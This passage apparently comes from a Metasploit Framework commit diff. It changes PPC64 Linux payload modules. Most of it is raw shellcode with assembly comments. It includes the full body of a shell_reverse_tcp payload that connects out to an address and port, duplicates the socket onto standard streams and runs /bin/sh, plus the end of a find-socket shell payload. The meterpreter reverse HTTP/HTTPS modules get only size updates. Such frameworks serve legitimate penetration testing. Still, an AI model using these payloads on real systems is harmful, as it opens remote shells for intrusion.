"\x7f\xe3\xfb\x78" + # mr r3,r31 #
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
"\x44\xff\xff\x02" + # sc #
"\x37\x18\xff\xff" + # addic. r24,r24,-1 #
"\x40\x80\xff\xec" + # bge+ <fndsockcode64+96> #
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
"\x40\x82\xff\xfd" + # bnel+ <fndsockcode64+120> #
"\x7f\xc8\x02\xa6" + # mflr r30 #
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
"\x44\xff\xff\x02" + # sc #
"/bin/sh"
}
))

88
modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb
View File

@ -33,50 +33,50 @@ module MetasploitModule
'LPORT' => [ 62, 'n' ],
},
'Payload' =>
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
"\x3b\xa0\x01\xff" +# li r29,511 #
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
"\xfb\x81\xff\xf9" +# stdu r28,-8(r1) #
"\xfb\x61\xff\xf9" +# stdu r27,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
"\x3e\xe0\x7f\x00" +# lis r23,32512 #
"\x62\xf7\x00\x01" +# ori r23,r23,1 #
"\x3a\xc0\x04\xd2" +# li r22,1234 #
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
"\x96\xc1\xff\xfc" +# stwu r22,-4(r1) #
"\x93\x61\xff\xfe" +# stw r27,-2(r1) #
"\x7c\x35\x0b\x78" +# mr r21,r1 #
"\xfb\x21\xff\xf9" +# stdu r25,-8(r1) #
"\xfa\xa1\xff\xf9" +# stdu r21,-8(r1) #
"\xfb\x41\xff\xf9" +# stdu r26,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x04" +# addi r3,r29,-508 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7f\x64\xdb\x78" +# mr r4,r27 #
"\x7f\x43\xd3\x78" +# mr r3,r26 #
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
"\x44\xff\xff\x02" +# sc #
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
"\x40\x80\xff\xec" +# bge+ <cntsockcode64+108> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel+ <cntsockcode64+132> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
"\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) #
"\xf8\x61\xff\xf9" +# stdu r3,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
"\x44\xff\xff\x02" +# sc #
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
"\x3b\xa0\x01\xff" + # li r29,511 #
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
"\xfb\x61\xff\xf9" + # stdu r27,-8(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
"\x3e\xe0\x7f\x00" + # lis r23,32512 #
"\x62\xf7\x00\x01" + # ori r23,r23,1 #
"\x3a\xc0\x04\xd2" + # li r22,1234 #
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
"\x96\xc1\xff\xfc" + # stwu r22,-4(r1) #
"\x93\x61\xff\xfe" + # stw r27,-2(r1) #
"\x7c\x35\x0b\x78" + # mr r21,r1 #
"\xfb\x21\xff\xf9" + # stdu r25,-8(r1) #
"\xfa\xa1\xff\xf9" + # stdu r21,-8(r1) #
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x04" + # addi r3,r29,-508 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x7f\x64\xdb\x78" + # mr r4,r27 #
"\x7f\x43\xd3\x78" + # mr r3,r26 #
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
"\x44\xff\xff\x02" + # sc #
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
"\x40\x80\xff\xec" + # bge+ <cntsockcode64+108> #
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
"\x40\x82\xff\xfd" + # bnel+ <cntsockcode64+132> #
"\x7f\xc8\x02\xa6" + # mflr r30 #
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
"\x44\xff\xff\x02" + # sc #
"/bin/sh"
}
))

2
modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux'
module MetasploitModule
CachedSize = 1079888
CachedSize = 1079936
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux'
module MetasploitModule
CachedSize = 1079888
CachedSize = 1079936
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

Some files were not shown because too many files have changed in this diff Show More